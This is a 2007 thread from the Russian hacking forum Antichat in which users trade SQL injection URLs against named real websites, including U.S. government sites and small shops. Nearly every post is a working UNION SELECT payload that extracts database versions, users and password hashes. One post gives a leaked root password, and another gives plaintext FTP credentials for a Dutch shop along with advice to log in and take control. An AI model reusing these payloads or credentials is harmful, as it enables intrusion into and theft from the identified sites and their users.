Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

19.08.2007, 13:37
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме: 1212427
Репутация:
187
|
|
.gov:
Код:
http://teleslin.lbl.gov/mysql/parseRTML2.php?id=-77+union+select+version(),user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
|
|
|

19.08.2007, 18:46
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме: 492591
Репутация:
123
|
|
http://www.arsenal-electro.ru/inc.php?include=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x17),0x17),3,4+from+users/*
не могу подобрать название колонки с паролями
|
|
|

20.08.2007, 02:44
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме: 2298631
Репутация:
380
|
|
Давно сюда не заглядывал, антибаян чекед =)
Код:
http://www.business-ua.com/icard2.phtml?id=-111+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),%20%200x71),0x71),4+from+mysql.user/*
root: crystaldragon
|
|
|

20.08.2007, 23:03
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме: 1373642
Репутация:
569
|
|
Кроме version(),user, password дальше не могу ничего подобрать
код:
http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
|
|
|

20.08.2007, 23:23
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме: 3372120
Репутация:
2565
|
|
Сообщение от fobofob
Кроме version(),user, password дальше не могу ничего подобрать
код:
http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
мона еще хеш админа вытащить...
Код:
http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user/*
|
|
|

20.08.2007, 23:31
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме: 4608122
Репутация:
874
|
|
http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,username,3,4,5,6+from+user/*
Вот это даст имя пользователя, это если ты не подобрал колонку.
Пароль ты нашел. Теперь лезь на фтп и рутай все это дело.
Я проверил работает!!!
ftp://www.kleijngeng.nl/ с такими данными пользователь - kleijnnl пароль - gifts4all
Зря сам не докопал. Все было просто. Я если не нахожу админку всегда пробую фтп.
удачи.
З.Ы. Только помни АЧАТ против дефейсов. И вообще лучше напиши им что дыра мол у вас и т.д.
Последний раз редактировалось Red_Red1; 20.08.2007 в 23:33..
|
|
|

20.08.2007, 23:50
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме: 492591
Репутация:
123
|
|
http://www.ipages.ru/index.php?id=9999+union+select+1,2,database()/*
помогите ето-нить, не могу таблицы подобрать
P.S. Сори за оффтоп киньте ссылку на базу названий таблиц для брутеры
|
|
|

21.08.2007, 00:12
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме: 4608122
Репутация:
874
|
|
2 Termin@L Тама есть АКТИВНАЯ ХСС в форуме, может поможет. А таблицы я тоже подобрать не смог.... пока не смог.
|
|
|

21.08.2007, 05:45
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме: 1212427
Репутация:
187
|
|
senate. michigan.gov
Код:
http://www.senate.michigan.gov/dem/transcript.php?id=-52%27+union+select+1,2,3,4,5,version(),concat_ws(0x3a,user,password),8,9,10,11,12+from+mysql.user+limit+0,1/*
|
|
|

21.08.2007, 08:09
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме: 1373642
Репутация:
569
|
|
Сообщение от Red_Red1
union+select+1,username,3,4,5,6+from+user/*
Вот это даст имя пользователя, это если ты не подобрал колонку.
Пароль ты нашел. Теперь лезь на фтп и рутай все это дело.
Я проверил работает!! Все было просто. Я если не нахожу админку всегда пробую фтп.
удачи.
З.Ы. Только помни АЧАТ против дефейсов. И вообще лучше напиши им что дыра мол у вас и т.д.
я знал имя юзера,а вот что на фтп можно залезть не догадался  ),я ведь только учусь... И все это на смарте,так как компа нет  спасибо за разъяснение! p.s напишите кто нить им,кто знает английский,что у них дыра,я не смогу т.к плохо знаю язык,скорее понимаю интуитивно  p.p.s Red_Red1,я не собирался дефейсить,просто интересен процесс добывания паролей и т.д и т. п 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|